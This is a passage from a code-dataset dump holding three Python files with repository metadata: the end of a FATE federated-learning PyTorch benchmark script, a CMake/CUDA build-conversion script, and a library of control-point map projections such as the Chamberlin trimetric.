self.top_model_guest(guest_fw + host_fw)\n return out\n\n def predict(self, data):\n rs = self.forward(data)\n return rs.detach().numpy()\n\n\nclass TestDataset(Dataset):\n\n def __init__(self, guest_data, host_data, label):\n super(TestDataset, self).__init__()\n self.g = guest_data\n self.h = host_data\n self.l = label\n\n def __getitem__(self, idx):\n return self.g[idx], self.h[idx], self.l[idx]\n\n def __len__(self):\n return len(self.l)\n\n\ndef build(param, shape1, shape2):\n return TestModel(shape1, shape2)\n\n\ndef main(config=\"./config.yaml\", param=\"./hetero_nn_breast_config.yaml\"):\n\n try:\n if isinstance(config, str):\n config = JobConfig.load_from_file(config)\n data_base_dir = config[\"data_base_dir\"]\n else:\n data_base_dir = config.data_base_dir\n if isinstance(param, str):\n param = JobConfig.load_from_file(param)\n data_guest = param[\"data_guest\"]\n data_host = param[\"data_host\"]\n idx = param[\"idx\"]\n label_name = param[\"label_name\"]\n # prepare data\n Xb = pandas.read_csv(os.path.join(data_base_dir, data_guest), index_col=idx)\n Xa = pandas.read_csv(os.path.join(data_base_dir, data_host), index_col=idx)\n y = Xb[label_name]\n out = Xa.drop(Xb.index)\n Xa = Xa.drop(out.index)\n Xb = Xb.drop(label_name, axis=1)\n # torch model\n model = build(param, Xb.shape[1], Xa.shape[1])\n Xb = t.Tensor(Xb.values)\n Xa = t.Tensor(Xa.values)\n y = t.Tensor(y.values)\n dataset = TestDataset(Xb, Xa, y)\n batch_size = len(dataset) if param['batch_size'] == -1 else param['batch_size']\n dataloader = DataLoader(dataset, batch_size=batch_size)\n optimizer = t.optim.Adam(lr=param['learning_rate']).to_torch_instance(model.parameters())\n\n if param['eval_type'] == 'binary':\n loss_fn = t.nn.BCELoss()\n\n for i in tqdm.tqdm(range(param['epochs'])):\n\n for gd, hd, label in dataloader:\n optimizer.zero_grad()\n pred = model([gd, hd])\n loss = loss_fn(pred.flatten(), label.type(t.float32))\n loss.backward()\n optimizer.step()\n\n eval_result = {}\n for metric in param[\"metrics\"]:\n if metric.lower() == \"auc\":\n predict_y = model.predict([Xb, Xa])\n auc = metrics.roc_auc_score(y, predict_y)\n eval_result[\"auc\"] = auc\n elif metric == \"accuracy\":\n predict_y = np.argmax(model.predict([Xb, Xa]), axis=1)\n predict_y = label_encoder.inverse_transform(predict_y)\n acc = metrics.accuracy_score(y_true=labels, y_pred=predict_y)\n eval_result[\"accuracy\"] = acc\n\n data_summary = {}\n except Exception as e:\n print(e)\n return data_summary, eval_result\n\n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser(\"BENCHMARK-QUALITY SKLEARN JOB\")\n parser.add_argument(\"-config\", type=str,\n help=\"config file\")\n parser.add_argument(\"-param\", type=str,\n help=\"config file for params\")\n args = parser.parse_args()\n if args.config is not None:\n main(args.config, args.param)\n else:\n main()\n", "repo_name": "FederatedAI/FATE", "sub_path": "examples/benchmark_quality/hetero_nn_pytorch/local-hetero_nn.py", "file_name": "local-hetero_nn.py", "file_ext": "py", "file_size_in_byte": 4792, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5296, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pipeline.fate_torch_hook", "line_number": 18, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 21, "usage_type": "attribute"}, {"api_name": "torch.nn.Sequential", "line_number": 26, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 26, "usage_type": "attribute"}, {"api_name": "torch.nn.Linear", "line_number": 27, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 27, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 28, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 28, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 29, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 29, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 30, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 30, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 33, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 33, "usage_type": "attribute"}, {"api_name": "torch.nn.Linear", "line_number": 34, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 34, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 35, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 35, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 36, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 36, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 37, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 37, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 40, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 40, "usage_type": "attribute"}, {"api_name": "torch.nn.Sequential", "line_number": 42, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 42, "usage_type": "attribute"}, {"api_name": "torch.nn.Linear", "line_number": 43, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 43, "usage_type": "name"}, {"api_name": "torch.nn.Sigmoid", "line_number": 44, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 44, "usage_type": "name"}, {"api_name": "torch.float", "line_number": 48, "usage_type": "attribute"}, {"api_name": "torch.utils.data.Dataset", "line_number": 59, "usage_type": "name"}, {"api_name": "pipeline.utils.tools.JobConfig.load_from_file", "line_number": 82, "usage_type": "call"}, {"api_name": "pipeline.utils.tools.JobConfig", "line_number": 82, "usage_type": "name"}, {"api_name": "pipeline.utils.tools.JobConfig.load_from_file", "line_number": 87, "usage_type": "call"}, {"api_name": "pipeline.utils.tools.JobConfig", "line_number": 87, "usage_type": "name"}, {"api_name": "pandas.read_csv", "line_number": 93, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 93, "usage_type": "call"}, {"api_name": "os.path", "line_number": 93, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 94, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 94, "usage_type": "call"}, {"api_name": "os.path", "line_number": 94, "usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 101, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 102, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 103, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 106, "usage_type": "call"}, {"api_name": "torch.optim.Adam", "line_number": 107, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 107, "usage_type": "attribute"}, {"api_name": "torch.nn.BCELoss", "line_number": 110, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 110, "usage_type": "attribute"}, {"api_name": "tqdm.tqdm", "line_number": 112, "usage_type": "call"}, {"api_name": "torch.float32", "line_number": 117, "usage_type": "attribute"}, {"api_name": "sklearn.metrics.roc_auc_score", "line_number": 125, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 125, "usage_type": "name"}, {"api_name": "numpy.argmax", "line_number": 128, "usage_type": "call"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 130, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 130, "usage_type": "name"}, {"api_name": "argparse.ArgumentParser", "line_number": 141, "usage_type": "call"}]}
+{"seq_id": "71521286247", "text": "#!/usr/bin/env python\n\nimport json\nimport subprocess\nimport os\nimport re\nimport shutil\nimport textwrap\n\n# this variable is assigned by cmake during build\nGPU_MPI_BUILD_TYPE = \"@CMAKE_BUILD_TYPE@\"\n\n\ndef is_inside(path, directory):\n path = os.path.realpath(path)\n directory = os.path.realpath(directory)\n return directory == os.path.commonpath([directory, path])\n\ndef escape_name(name):\n return name.replace('/', '_').replace('.', '_')\n\n\nheader_pattern = re.compile('#include [<\"](.*)[\">]')\n\ndef find_headers(path_to_file, include_dirs):\n \"\"\" Looks for header inside include_dirs and header local directory.\n Returns list of detected headers.\n \"\"\"\n\n file_dir = os.path.dirname(os.path.realpath(__file__))\n\n # we should search relative headers in current dir\n all_include_dirs = [file_dir] + include_dirs\n\n detected_headers = []\n with open(path_to_file, 'r') as f:\n for match in header_pattern.finditer(f.read()):\n header_name = match.group(1)\n\n # search relative headers in include dirs and detect their absolute location\n absolute_header = None\n if not os.path.isabs(header_name):\n for include_dir in all_include_dirs:\n header_candidate = os.path.join(include_dir, header_name)\n if os.path.exists(header_candidate):\n absolute_header = os.path.realpath(header_candidate)\n break\n\n # if nothing is find, then it is system header that should be skipped\n if absolute_header is None:\n continue\n\n detected_headers.append(absolute_header)\n\n all_headers = detected_headers\n \n # for each detected header we need to look for other includes recurrently\n for header in detected_headers:\n all_headers += find_headers(header, include_dirs)\n\n # return each header once\n all_headers = list(set(all_headers))\n\n return all_headers\n\ndef get_includes(absolute_path, compile_commands):\n for entry in compile_commands:\n if entry['absolute_source_path'] == absolute_path:\n return entry['project_include_dirs']\n raise Exception(f'Entry {absolute_path} not found in compilation database')\n\ndef get_definitions(absolute_path, compile_commands):\n for entry in compile_commands:\n if entry['absolute_source_path'] == absolute_path:\n return entry['definitions']\n raise Exception(f'Entry {absolute_path} not found in compilation database')\n\ndef run_build():\n os.makedirs('./gpumpi_build', exist_ok=True)\n process = subprocess.Popen(f\"cmake .. -DCMAKE_BUILD_TYPE={GPU_MPI_BUILD_TYPE}\".split(), cwd='./gpumpi_build')\n process.wait()\n process = subprocess.Popen(\"cmake --build ./gpumpi_build\".split())\n process.wait()\n\nif __name__ == '__main__':\n\n script_dir = os.path.dirname(os.path.realpath(__file__))\n project_dir = os.getcwd()\n\n def run_cmd(command, directory):\n process = subprocess.Popen(command, cwd=directory)\n process.wait()\n if process.returncode != 0:\n raise Exception(\"failed\")\n\n with open('compile_commands.json', 'r') as f:\n compile_commands = json.load(f)\n\n\n all_sources = []\n all_headers = []\n\n for entry in compile_commands:\n # detect include directories inside project dir for each target\n entry['project_include_dirs'] = []\n for arg in entry['arguments']:\n # detect only include directories\n if not arg.startswith('-I'):\n continue\n\n include_dir = arg[2:]\n\n # make all paths absolute\n if not os.path.isabs(include_dir):\n include_dir = os.path.realpath(os.path.join(entry['directory'], include_dir))\n\n # skip includes outside of project directory\n if not is_inside(include_dir, project_dir):\n continue \n\n entry['project_include_dirs'].append(include_dir)\n\n # detect definitions\n entry['definitions'] = []\n for arg in entry['arguments']:\n if arg.startswith('-D'):\n entry['definitions'].append(arg[2:])\n\n\n # detect absolute path to source files\n entry['absolute_source_path'] = os.path.realpath(os.path.join(entry['directory'], entry['file']))\n\n # detect list of headers inside project directory that are used from source files \n all_headers += find_headers(entry['absolute_source_path'], entry['project_include_dirs'])\n all_sources += [entry['absolute_source_path']]\n\n # mention sources and headers only once\n all_sources = list(set(all_sources))\n all_headers = list(set(all_headers))\n\n # create \".cuh\" for very simple headers, because libtooling skips them\n for header in all_headers:\n expected_name = header + '.cuh'\n if not os.path.exists(expected_name):\n shutil.copyfile(header, expected_name)\n\n # add to each include in '.cu' or '.cuh' file additional '.cuh' suffix\n for file_name in (*all_sources, *all_headers):\n\n if file_name in all_sources:\n cu_file_name = file_name + '.cu'\n else:\n cu_file_name = file_name + '.cuh'\n\n with open(cu_file_name, 'r') as in_file: \n text = re.sub('#include ([<\"])(.*)([\">])', '#include \\g<1>\\g<2>.cuh\\g<3>', in_file.read())\n text = re.sub('\\.cuh\\.cuh', '.cuh', text) # fixes double modification\n with open(cu_file_name, 'w') as out_file:\n out_file.write(text)\n\n\n # for each source file detect if __gpu_main present. If yes, it will define executable,\n # otherwise, it will define library.\n executables = []\n libraries = []\n for file_name in all_sources:\n cu_file_name = file_name + '.cu'\n with open(cu_file_name, 'r') as f:\n if '__gpu_main' in f.read():\n executables.append(file_name)\n else:\n libraries.append(file_name)\n\n cmakelists = textwrap.dedent(f\"\"\"\n cmake_minimum_required(VERSION 3.12)\n project(examples LANGUAGES C CXX CUDA)\n\n set(CMAKE_CUDA_FLAGS_DEBUG \"${CMAKE_CUDA_FLAGS_DEBUG} -G\") \n\n # specify cuda architectures for newer cmake\n set(CMAKE_CUDA_ARCHITECTURES 60 61 70)\n\n # specify cuda architectures for older cmake\n set(CMAKE_CUDA_FLAGS\n \"${CMAKE_CUDA_FLAGS} \\\n -gencode arch=compute_60,code=sm_60 \\\n -gencode arch=compute_61,code=sm_61 \\\n -gencode arch=compute_70,code=sm_70\")\n\n include({script_dir}/../gpu_libs-exports.cmake)\n\n set(CMAKE_CUDA_SEPARABLE_COMPILATION ON)\n \"\"\")\n\n for f in all_sources:\n includes = get_includes(f, compile_commands)\n defines = get_definitions(f, compile_commands)\n escaped_name = escape_name(f)\n target_type = 'executable' if f in executables else 'library'\n\n cmakelists += textwrap.dedent(f\"\"\"\n add_{target_type}(target_{escaped_name} {f}.cu)\n target_link_libraries(target_{escaped_name} PRIVATE gpu_libs)\n \"\"\")\n\n if includes:\n includes_str = \" \".join(includes)\n cmakelists += textwrap.dedent(f\"\"\"\n target_include_directories(target_{escaped_name} PRIVATE {includes_str})\n \"\"\")\n\n for lib in libraries:\n for exe in executables:\n escaped_lib_name = escape_name(lib)\n escaped_exe_name = escape_name(exe)\n cmakelists += textwrap.dedent(f\"\"\"\n target_link_libraries(target_{escaped_exe_name} PRIVATE target_{escaped_lib_name})\n \"\"\")\n\n with open('CMakeLists.txt', 'w') as f:\n f.write(cmakelists)\n\n run_build()\n\n", "repo_name": "maerhart/dphpc-project", "sub_path": "scripts/build_on_gpu.py", "file_name": "build_on_gpu.py", "file_ext": "py", "file_size_in_byte": 7719, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.path.realpath", "line_number": 15, "usage_type": "call"}, {"api_name": "os.path", "line_number": 15, "usage_type": "attribute"}, {"api_name": "os.path.realpath", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path", "line_number": 16, "usage_type": "attribute"}, {"api_name": "os.path.commonpath", "line_number": 17, "usage_type": "call"}, {"api_name": "os.path", "line_number": 17, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 23, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 30, "usage_type": "call"}, {"api_name": "os.path", "line_number": 30, "usage_type": "attribute"}, {"api_name": "os.path.realpath", "line_number": 30, "usage_type": "call"}, {"api_name": "os.path.isabs", "line_number": 42, "usage_type": "call"}, {"api_name": "os.path", "line_number": 42, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 44, "usage_type": "call"}, {"api_name": "os.path", "line_number": 44, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 45, "usage_type": "call"}, {"api_name": "os.path", "line_number": 45, "usage_type": "attribute"}, {"api_name": "os.path.realpath", "line_number": 46, "usage_type": "call"}, {"api_name": "os.path", "line_number": 46, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 79, "usage_type": "call"}, {"api_name": "subprocess.Popen", "line_number": 80, "usage_type": "call"}, {"api_name": "subprocess.Popen", "line_number": 82, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 87, "usage_type": "call"}, {"api_name": "os.path", "line_number": 87, "usage_type": "attribute"}, {"api_name": "os.path.realpath", "line_number": 87, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 88, "usage_type": "call"}, {"api_name": "subprocess.Popen", "line_number": 91, "usage_type": "call"}, {"api_name": "json.load", "line_number": 97, "usage_type": "call"}, {"api_name": "os.path.isabs", "line_number": 114, "usage_type": "call"}, {"api_name": "os.path", "line_number": 114, "usage_type": "attribute"}, {"api_name": "os.path.realpath", "line_number": 115, "usage_type": "call"}, {"api_name": "os.path", "line_number": 115, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 115, "usage_type": "call"}, {"api_name": "os.path.realpath", "line_number": 131, "usage_type": "call"}, {"api_name": "os.path", "line_number": 131, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 131, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 144, "usage_type": "call"}, {"api_name": "os.path", "line_number": 144, "usage_type": "attribute"}, {"api_name": "shutil.copyfile", "line_number": 145, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 156, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 157, "usage_type": "call"}, {"api_name": "textwrap.dedent", "line_number": 174, "usage_type": "call"}, {"api_name": "textwrap.dedent", "line_number": 201, "usage_type": "call"}, {"api_name": "textwrap.dedent", "line_number": 208, "usage_type": "call"}, {"api_name": "textwrap.dedent", "line_number": 216, "usage_type": "call"}]}
+{"seq_id": "40325099948", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Oct 31 13:38:02 2019\n\n@author: brsr\n\"\"\"\nimport pyproj\nimport warnings\nimport numpy as np\nfrom abc import ABC\nfrom scipy.optimize import minimize\n\nfrom .transformations import Transformation, UnitVector\nfrom .helper import sqrt, antipode_v, central_angle, trigivenlengths, triangle_solid_angle\n\n#TODO:\n#vectorize all the things, or convert to \n#make a better implementation of conformal\n\n#arange3 = np.arange(3)\n#FIRST AXIS IS SPATIAL\n\n_unitsphgeod = pyproj.Geod(a=1, b=1)\n\nclass Double(Transformation):\n \"\"\"Linear combination of two projections\n \n Note that the inverse transformation is not the inverse of the forward\n transformation: it is the linear combination of the inverse \n transformations.\n \"\"\"\n def __init__(self, proj1, proj2, t=0.5):\n subproj = [proj1, proj2]\n super().__init__()\n self.subproj = subproj\n self.t = t\n\n def transform(self, lon, lat):\n subproj = self.subproj\n t = self.t\n return ((1 - t)*subproj[0].transform(lon, lat)\n + t*subproj[1].transform(lon, lat))\n\n def inv_transform(self, x, y):\n subproj = self.subproj\n t = self.t\n return ((1 - t)*subproj[0].inv_transform(x, y)\n + t*subproj[1].inv_transform(x, y))\n\nclass Multiple(Transformation):\n \"\"\"Linear combination of several projections\n \n Note that the inverse transformation is not the inverse of the forward\n transformation: it is the linear combination of the inverse \n transformations.\n \"\"\"\n def __init__(self, subproj, t):\n super().__init__()\n assert len(subproj) == len(t)\n self.subproj = subproj\n self.t = t\n\n def transform(self, lon, lat):\n rx = 0\n for proj, t in zip(self.subproj, self.t):\n rx += t * proj.transform(lon, lat)\n return rx\n\n def inv_transform(self, x, y):\n rx = 0\n for proj, t in zip(self.subproj, self.t):\n rx += t * proj.inv_transform(x, y)\n return rx\n \nclass CtrlPtsProjection(Transformation, ABC):\n \"\"\"Subclass for any map projection that uses (2 or more) control points.\"\"\"\n def __init__(self, ctrlpts, geod = _unitsphgeod):\n \"\"\"Parameters:\n ctrlpts: 2x3 or 2x4 Numpy array, latitude and longitude of\n each control point\n geod= a pyproj.Geod object. For a unit sphere use\n pyproj.Geod(a=1,b=1)\n \"\"\"\n n = ctrlpts.shape[1]\n if self.nctrlpts != n:\n raise ValueError(\n 'ctrlpts has wrong number of points for this projection')\n self.geod = geod\n #it's possible to get a geod where this would give the wrong answer,\n #but I think it would have to be really weird\n area, _ = geod.polygon_area_perimeter([0,120,-120],[0,0,0])\n self.totalarea = 2*area\n\n self.ctrlpts = ctrlpts\n ctrlpts_v = UnitVector.transform_v(ctrlpts)\n self.ctrlpts_v = ctrlpts_v\n center_v = ctrlpts_v.sum(axis=1)\n self.center_v = center_v / np.linalg.norm(center_v)\n self.center = UnitVector.invtransform_v(center_v)\n antipode = antipode_v(ctrlpts)\n self.antipode = antipode\n self.antipode_v = UnitVector.transform_v(antipode)\n self.sa = 0\n if self.nctrlpts > 2:\n faz, baz, sides = self.geod.inv(ctrlpts[0], ctrlpts[1],\n np.roll(ctrlpts[0], -1),\n np.roll(ctrlpts[1], -1))\n self.sides = sides\n self.faz = faz\n self.baz = baz\n self.ctrl_angles = (faz - np.roll(baz, 1))%360\n area, _ = geod.polygon_area_perimeter(*ctrlpts)\n self.area = area\n self.ca = central_angle(ctrlpts_v,\n np.roll(ctrlpts_v, -1, axis=1))\n for i in range(1, self.nctrlpts-1):\n self.sa += triangle_solid_angle(ctrlpts_v[..., 0],\n ctrlpts_v[..., i],\n ctrlpts_v[..., i+1])\n\n self.edgenormals = np.cross(ctrlpts_v,\n np.roll(ctrlpts_v, -1, axis=1), axis=0)\n\n else:\n faz, baz, sides = self.geod.inv(ctrlpts[0,0], ctrlpts[1,0],\n ctrlpts[0,1], ctrlpts[1,1])\n self.sides = sides\n self.faz = faz\n self.baz = baz\n self.area = 0\n self.ca = central_angle(ctrlpts_v[..., 0], ctrlpts_v[..., 1])\n self.edgenormals = np.cross(ctrlpts_v[..., 0], ctrlpts_v[..., 1])\n\n self.cosca = np.cos(self.ca)\n self.sinca = np.sin(self.ca)\n\n if self.sa < 0:\n warnings.warn('control polygon is in negative orientation, '\n + 'may cause unusual results')\n\n if self.nctrlpts == 4:\n ctrlpts_v = self.ctrlpts_v\n v0 = ctrlpts_v[..., 0]\n v1 = ctrlpts_v[..., 1]\n v2 = ctrlpts_v[..., 2]\n v3 = ctrlpts_v[..., 3]\n poip1 = np.cross(np.cross(v0, v1), np.cross(v3, v2))\n poip2 = np.cross(np.cross(v0, v3), np.cross(v1, v2))\n poip = np.stack([[poip1, -poip1],\n [poip2, -poip2]]).transpose(2,0,1)\n poip = poip / np.linalg.norm(poip, axis=0)\n self.poi_v = poip\n self.poi = UnitVector.invtransform_v(poip)\n self.crossx = np.cross(ctrlpts_v,\n np.roll(ctrlpts_v, -2, axis=1),\n axis=0)[..., :2]\n\n def orienttgtpts(self, tgtpts, N = (0, 90)):\n \"\"\"Orient target points so that line from 0 to the projection of N\n points up. Will fail if map projection doesn't define tgtpts.\"\"\"\n pN = self.transform(*N)\n if np.allclose(pN, [0,0]):\n raise ValueError('projection of N too close to 0')\n angle = np.arctan2(pN[0],pN[1])\n rotm = np.array([[np.cos(angle), -np.sin(angle)],\n [np.sin(angle), np.cos(angle)]])\n result = rotm @ tgtpts\n self.tgtpts = result\n\n def lune(self, lon, lat):\n \"\"\"\n Determine which lune a point or series of points lies in.\n Lune 0 is the lune with vertex at the centroid and edges passing through\n control points 0 and 1. Lune 1 is the same using control pts 1 and 2,\n and Lune 2 uses control pts 2 and 0.\n \"\"\"\n #inexact on ellipsoids but close enough\n testpt = UnitVector.transform(lon, lat)\n testpt_v = testpt.reshape(3,-1)\n ctrlpts_v = self.ctrlpts_v\n center_v = self.center_v\n cx = np.cross(center_v, ctrlpts_v, axis=0)\n sk = cx.T @ testpt_v\n sg = sk >= 0\n ind = sg & ~np.roll(sg, shift=-1, axis=0)\n result = np.argmax(ind, axis=0)\n return result.reshape(testpt.shape[1:])\n\nclass DoubleCtrlPts(CtrlPtsProjection):\n \"\"\"Linear combination of two projections\n \n Note that the inverse transformation is not the inverse of the forward\n transformation: it is the linear combination of the inverse \n transformations.\n \"\"\"\n def __init__(self, ctrlpts, proj1, proj2, t=0.5):\n subproj = [proj1(ctrlpts), proj2(ctrlpts)]\n self.nctrlpts = subproj[0].nctrlpts\n if self.nctrlpts != subproj[1].nctrlpts:\n raise ValueError('proj1 and proj2 have different # of ctrlpts')\n super().__init__(ctrlpts)\n self.subproj = subproj\n self.t = t\n\n def transform(self, lon, lat):\n subproj = self.subproj\n t = self.t\n return ((1 - t)*subproj[0].transform(lon, lat)\n + t*subproj[1].transform(lon, lat))\n\n def inv_transform(self, lon, lat):\n subproj = self.subproj\n t = self.t\n return ((1 - t)*subproj[0].transform(lon, lat)\n + t*subproj[1].transform(lon, lat))\n\nclass KProjection(CtrlPtsProjection):\n exact = True\n k = 1\n def extend(self, v):\n normal = self.center_v\n k = self.k\n n = np.linalg.norm(v, axis=0, keepdims=True)\n if self.exact:\n vdotc = np.tensordot(v, normal, axes=(0, 0))[np.newaxis]\n vdotv = n**2\n p = -vdotc + sqrt(1 + vdotc**2 - vdotv)\n else:\n p = 1 - n\n #print(v.shape, p.shape, normal.shape)\n return v + k*p*normal[..., np.newaxis]\n \n def transform(self, *args, **kwargs):\n return NotImplemented\n \n#%% not-polygonal projections\nclass ChambTrimetric(CtrlPtsProjection):\n \"\"\"Chamberlin trimetric projection\"\"\"\n #FIXME this implementation fails for control triangles with \n #high aspect ratios\n nctrlpts = 3\n\n def __init__(self, ctrlpts, geod=_unitsphgeod):\n super().__init__(ctrlpts, geod)\n self.tgtpts = trigivenlengths(self.sides)\n try:\n self.orienttgtpts(self.tgtpts)\n except ValueError:\n pass\n\n def transform(self, x, y, **kwargs):\n if hasattr(x, '__iter__'):\n raise TypeError()\n tgtpts = self.tgtpts\n f, b, rad = self.geod.inv(self.ctrlpts[0], self.ctrlpts[1],\n x*np.ones(3), y*np.ones(3))\n faz = self.faz\n raz1 = (faz - f) % 360\n radsq = np.array(rad).squeeze()**2\n ctgt = tgtpts.T.copy().view(dtype=complex).squeeze()\n a = np.roll(ctgt, -1) - ctgt\n b = ctgt\n l = abs(a)\n lsq = l**2\n rsq = radsq/lsq\n ssq = np.roll(radsq, -1, axis=-1)/lsq\n x0 = (rsq - ssq + 1)/2\n y0 = sqrt(-rsq**2 + 2*rsq*(ssq + 1) - (ssq - 1)**2)/2\n y0[np.isnan(y0)] = 0\n y = np.where(raz1 > 180, -y0, y0)\n z0 = x0 +1j*y\n pts = (a * z0 + b)\n result = np.mean(pts)\n return result.real, result.imag\n\n def invtransform(self, *args, **kwargs):\n return NotImplemented\n\nclass LstSqTrimetric(ChambTrimetric):\n \"\"\"Least-squares variation of the Chamberlin trimetric projection\"\"\"\n def transform(self, x, y, **kwargs):\n init = super().transform(x, y)\n tgtpts = self.tgtpts\n f, b, rad = self.geod.inv(self.ctrlpts[0], self.ctrlpts[1],\n x*np.ones(3), y*np.ones(3))\n def objective(v):\n x = v[0]\n y = v[1]\n a = tgtpts[0]\n b = tgtpts[1]\n xma = x-a\n ymb = y-b\n dist = np.sqrt(xma**2 + ymb**2)\n result = np.sum((dist - rad)**2 )\n f = 1 - rad/dist\n f[rad <= 0] = 1\n jac = 2*np.array([np.sum(xma*f), np.sum(ymb*f)])\n return result, jac\n res = minimize(objective, init, jac=True,\n method = 'BFGS')\n return res.x\n\nclass LinearTrimetric(CtrlPtsProjection):\n \"\"\"The linear variation of the Chamberlin Trimetric projection.\"\"\"\n nctrlpts = 3\n matrix1 = np.array([[0,-1],\n [1,0]])\n matrix2 = np.array([[0, -1, 1],\n [1, 0, -1],\n [-1, 1, 0]])\n matrixinv1 = np.array([[-2,1,1],\n [1,-2,1],\n [1,1,-2]])*2/3\n\n def __init__(self, ctrlpts, geod=_unitsphgeod):\n \"\"\"Parameters:\n ctrlpts: 2x3 Numpy array, latitude and longitude of each control point\n geod= a pyproj.Geod object. For a unit sphere use\n pyproj.Geod(a=1,b=1).\n \"\"\"\n super().__init__(ctrlpts, geod)\n self.radius = ((geod.a**(3/2) + geod.b**(3/2))/2)**(2/3)\n self.tgtpts = trigivenlengths(self.sides)\n self.setmat()\n # try:\n # self.orienttgtpts(self.tgtpts)\n # self.setmat()\n # except ValueError:\n # pass\n\n vctrl = self.ctrlpts_v\n self.invctrlvector = np.linalg.pinv(vctrl)\n self.invperpmatrix = self.invctrlvector @ self.invctrlvector.T\n cosrthmin = 1 / np.sqrt(self.invperpmatrix.sum())\n self.hminall = np.arccos(cosrthmin)**2\n\n def setmat(self, tgtpts=None):\n \"\"\"Set matrices that use tgtpts\"\"\"\n if tgtpts is None:\n tgtpts = self.tgtpts\n else:\n self.tgtpts = tgtpts\n tgtde = np.linalg.det(np.concatenate([tgtpts, np.ones((1,3))], axis=0))\n self.m = self.matrix1 @ tgtpts @ self.matrix2 /(2*tgtde)\n self.minv = self.matrixinv1 @ tgtpts.T\n\n def transform_v(self, pts):\n rpts = pts.reshape((2,-1)).T\n rad = []\n for x,y in rpts:\n f, b, radi = self.geod.inv(x*np.ones(3), y*np.ones(3),\n self.ctrlpts[0], self.ctrlpts[1])\n rad.append(radi)\n shape = list(pts.shape)\n shape[0] = 3\n rad = np.array(rad).T\n radsq = np.array(rad)**2\n result = self.m @ radsq\n return result.reshape(pts.shape)\n\n def invtransform_v(self, pts, n=20, stop=1E-8):\n if not self.geod.sphere:\n warnings.warn('inverse transform is approximate on ellipsoids')\n rpts = pts.reshape((2,-1))\n k = self.minv @ rpts/self.radius**2\n hmin = -np.min(k, axis=0)\n print('k: ', k)\n #hmax = np.pi**2-np.max(k, axis=0)\n hminall = self.hminall\n h = np.where(hmin < hminall, hminall, hmin)\n print('h: ', h)\n for i in range(n):\n rsq = (k + h)\n #pos = rsq > 0\n neg = rsq < 0\n zer = rsq == 0\n c = np.where(neg, np.cosh(np.sqrt(-rsq)), np.cos(np.sqrt(rsq)))\n b = np.where(neg, np.sinh(np.sqrt(-rsq)),\n np.sin(np.sqrt(rsq)))/np.sqrt(np.abs(rsq))\n b[zer] = 1\n f = np.einsum('i...,ij,j...', c, self.invperpmatrix, c) - 1\n fprime = np.einsum('i...,ij,j...', c, self.invperpmatrix, b)\n delta = f/fprime\n h += delta\n print('delta:', delta)\n print('h: ', h)\n if np.max(np.abs(delta)) < stop:\n break\n #h = np.clip(h, hmin, hmax)\n rsq = np.clip(k + h, 0, np.pi**2)\n c = np.cos(np.sqrt(rsq))\n vector = self.invctrlvector.T @ c\n print(c)\n print(vector)\n return UnitVector.invtransform_v(vector).reshape(pts.shape)\n\n def nmforplot(self, pts, n=100):\n rpts = pts.reshape((2,-1))\n k = self.minv @ rpts/self.radius**2\n hmin = -np.min(k, axis=0)\n hmax = np.pi**2-np.max(k, axis=0)\n h = np.linspace(hmin,hmax,100).T\n rsq = (k[..., np.newaxis] + h)\n c = np.cos(np.sqrt(rsq))\n nm = np.einsum('i...,ij,j...', c, self.invperpmatrix, c)\n\n return h, nm\n\n\n#%%\nif __name__ == \"__main__\":\n import doctest\n sup = np.testing.suppress_warnings()\n sup.filter(RuntimeWarning)\n options = doctest.NORMALIZE_WHITESPACE | 